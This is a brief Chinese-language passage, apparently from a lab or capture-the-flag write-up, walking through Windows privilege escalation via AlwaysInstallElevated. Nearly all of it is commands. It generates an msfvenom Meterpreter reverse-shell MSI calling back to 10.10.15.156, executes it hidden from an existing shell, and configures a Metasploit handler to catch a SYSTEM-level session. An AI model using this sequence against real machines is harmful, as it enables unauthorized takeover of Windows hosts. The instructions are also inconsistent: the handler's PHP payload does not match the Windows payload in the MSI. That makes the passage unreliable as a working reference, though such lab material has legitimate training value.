提权我们可以利用AlwaysInstalledElevated的提权漏洞,
那么创建一个msi文件,命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.15.156 lport=5555 -f msi > shell.msi
在123.exe的shell中执行 execute -H -f shell.msi
再次开启一个新的端口监听:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 5555
exploit
然后可以得到一个连接,使用getuid可以得到sytem权限